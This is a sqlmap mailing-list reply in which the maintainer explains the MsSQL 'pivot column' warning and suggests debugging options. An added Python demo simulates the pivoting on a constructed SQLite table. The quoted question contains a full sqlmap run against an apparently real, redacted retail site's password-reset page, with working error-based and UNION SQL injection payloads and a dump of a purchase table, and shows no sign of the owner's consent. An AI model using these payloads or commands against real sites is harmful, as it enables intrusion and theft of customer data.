Re: [sqlmap-users] sqlmap stuck + can not retrieve all rows in a error based sql injection
From: Miroslav S. <mir...@gm...> - 2012-04-10 18:17:31
Hi.

On Tue, Apr 10, 2012 at 5:00 PM, Daniel Shapira <fai...@gm...> wrote:

> Hey guys
> i have a problem here
> take a look
> sqlmap almost always stuck with the message - [WARNING] no proper pivot column
> provided (with unique values). It won't be possible to retrieve all rows

This is exactly what it says. As there is no LIMIT/OFFSET mechanism in MsSQL we use "pivoting" for retrieving data in MsSQL. Unique values for one column are retrieved while the rest of columns are retrieved through "WHERE <pivot_column>=current" relation.

> even if i let it run for days it will not dump a thing,

People. If sqlmap doesn't dump anything "for minutes" then there is no need for running it "for days". In those kinds of situations options like --parse-errors or -t traffic.txt are gold.

> sometimes it does retrieve some data but out of 1000 rows it will return around
> 10 rows only

Is there a way for you to send me privately content of traffic file for such run (you just have to append --fresh-queries -t traffic.txt to the end of used commands)

Also, it would be great if you could just try for yourself to run that case with --no-cast switch and report back if that helped

Kind regards,
Miroslav Stampar

> hope someone can help me with that
> thanks
> Microsoft Windows [Version 6.1.7600]
> Copyright (c) 2009 Microsoft Corporation. All rights reserved.
>
> F:\Users\Dan>cd desktop/sqlmap
>
> F:\Users\Dan\Desktop\sqlmap>sqlmap.py --random-agent -u
> http://www.xxxxxxxx.co.il:80/forgotpass.asp--data="cmdLogin==???&sEmail=1" -D
> camera4less -T dbo.xxxx -C xxx,xxx,xxx,xxx --dump
>
> sqlmap/1.0-dev (r4976) - automatic SQL injection and database takeover tool
> http://www.sqlmap.org
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
> consent is illegal. It is the end user's responsibility to obey all applicable
> local, state and federal laws. Authors assume no liability and are not responsible
> for any misuse or damage caused by this program
>
> [*] starting at 17:49:12
>
> [17:49:13] [INFO] fetched random HTTP User-Agent header from file 'F:\Users\xxx\Desktop\sqlmap\txt\user-agents.txt': Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3
> [17:49:13] [INFO] using 'F:\Users\xxx\Desktop\sqlmap\output\www.xxxxx.co.il\session' as session file
> [17:49:13] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from session file
> [17:49:13] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: POST
> Parameter: sEmail
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
>     Payload: cmdLogin==???&sEmail=1' AND 6043=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(102)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6043=6043) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58))) AND 'rxzU'='rxzU
>
>     Type: UNION query
>     Title: Generic UNION query (NULL) - 2 columns
>     Payload: cmdLogin==???&sEmail=1' UNION ALL SELECT CHAR(58)+CHAR(111)+CHAR(102)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(79)+CHAR(87)+CHAR(108)+CHAR(111)+CHAR(87)+CHAR(121)+CHAR(87)+CHAR(90)+CHAR(58)+CHAR(101)+CHAR(111)+CHAR(105)+CHAR(58), NULL-- AND 'lpxC'='lpxC
> ---
>
> [17:49:13] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2000
> do you want sqlmap to consider provided column(s):
> [1] as LIKE column names (default)
> [2] as exact column names
> > 2
>
> [17:49:17] [INFO] fetching columns 'xxx, xxx, xxx, xxx' for table 'xxx' in database 'xxx'
> [17:49:17] [INFO] the SQL query used returns 4 entries
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] resumed: "xxx","varchar"
> [17:49:17] [INFO] fetching entries of column(s) 'xxx, xxx, xxx, xxx' for table 'purchase' in database 'xxx'
> [17:49:17] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxxme'
> [17:49:18] [INFO] fetching number of distinct values for column 'xxx'
> [17:49:18] [WARNING] no proper pivot column provided (with unique values). It won't be possible to retrieve all rows

--
Miroslav Stampar
http://about.me/stamparm
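
The pivoting described in the reply above, as an added example that is not sqlmap's code and not part of the original message: a simplified model run against a constructed in-memory SQLite database, showing why a pivot column without unique values returns fewer rows than the table holds. The table names, column names and data are hypothetical, and the selection rule (the column with the most distinct values becomes the pivot) is an assumption based on the log lines above.

```python
import sqlite3

def pivot_dump(conn, table, columns):
    """Read a table without LIMIT/OFFSET; returns (pivot, is_unique, rows)."""
    cur = conn.cursor()
    one = lambda sql, args=(): cur.execute(sql, args).fetchone()[0]
    # Identifiers are interpolated only because they are constants of this demo.
    total = one(f"SELECT COUNT(*) FROM {table}")
    distinct = {c: one(f"SELECT COUNT(DISTINCT {c}) FROM {table}") for c in columns}
    pivot = max(columns, key=distinct.get)      # column with most distinct values
    is_unique = distinct[pivot] == total        # False -> the [WARNING] case
    rows, current = [], None
    while True:
        # Step to the next pivot value: the smallest one above the current one.
        if current is None:
            current = one(f"SELECT MIN({pivot}) FROM {table}")
        else:
            current = one(f"SELECT MIN({pivot}) FROM {table} WHERE {pivot} > ?",
                          (current,))
        if current is None:
            break
        row = {pivot: current}
        for c in columns:
            if c != pivot:
                # "WHERE <pivot_column>=current": yields one value per pivot value,
                # so rows sharing a pivot value collapse into a single row.
                row[c] = one(f"SELECT MIN({c}) FROM {table} WHERE {pivot} = ?",
                             (current,))
        rows.append(row)
    return pivot, is_unique, rows

def build_sample():
    """Constructed data: the same six purchases with and without a unique id."""
    conn = sqlite3.connect(":memory:")
    data = [("a@example.test", "Haifa"), ("a@example.test", "Eilat"),
            ("b@example.test", "Haifa"), ("c@example.test", "Haifa"),
            ("c@example.test", "Eilat"), ("c@example.test", "Haifa")]
    conn.execute("CREATE TABLE with_id (id INTEGER, email TEXT, city TEXT)")
    conn.execute("CREATE TABLE no_id (email TEXT, city TEXT)")
    conn.executemany("INSERT INTO with_id VALUES (?, ?, ?)",
                     [(i + 1, e, c) for i, (e, c) in enumerate(data)])
    conn.executemany("INSERT INTO no_id VALUES (?, ?)", data)
    return conn

if __name__ == "__main__":
    conn = build_sample()
    for table, cols in (("with_id", ["id", "email", "city"]), ("no_id", ["email", "city"])):
        pivot, is_unique, rows = pivot_dump(conn, table, cols)
        print(table, "pivot:", pivot, "unique:", is_unique, "rows:", len(rows), "of 6")
```

With a unique `id` column all six rows come back; without it the walk stops after three, one per distinct `email`, which is the behaviour the warning announces.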